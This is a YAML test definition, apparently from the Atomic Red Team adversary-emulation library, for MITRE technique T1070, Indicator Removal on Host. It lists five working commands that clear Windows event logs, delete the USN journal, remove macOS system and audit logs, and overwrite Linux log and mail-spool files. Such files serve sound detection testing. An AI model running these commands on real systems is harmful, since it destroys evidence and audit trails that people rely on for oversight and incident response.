atomic-red-team/atomics/T1070/T1070.yaml

---
attack_technique: T1070
display_name: Indicator Removal on Host

atomic_tests:
- name: Clear Logs
  description: |
    Clear Windows Event Logs
  supported_platforms:
    - windows
  input_arguments:
    log_name:
      description: Windows Log Name, ex System
      type: String
      default: System
  executor:
    name: command_prompt
    elevation_required: true
    command: |
      wevtutil cl #{log_name}

- name: FSUtil
  description: |
    Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
  supported_platforms:
    - windows
  executor:
    name: command_prompt
    elevation_required: true
    command: |
      fsutil usn deletejournal /D C:

- name: rm -rf
  description: |
    Delete system and audit logs
  supported_platforms:
    - macos
    - linux
  executor:
    name: sh
    command: |
      rm -rf /private/var/log/system.log*
      rm -rf /private/var/audit/*

- name: Overwrite Linux Mail Spool
  description: |
    This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
  supported_platforms:
    - linux
  input_arguments:
    username:
      description: Username of mail spool
      type: String
      default: root
  executor:
    name: bash
    command: |
      echo 0> /var/spool/mail/#{username}

- name: Overwrite Linux Log
  description: |
    This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
  supported_platforms:
    - linux
  input_arguments:
    log_path:
      description: Path of specified log
      type: Path
      default: /var/log/secure
  executor:
    name: bash
    command: |
      echo 0> #{log_path}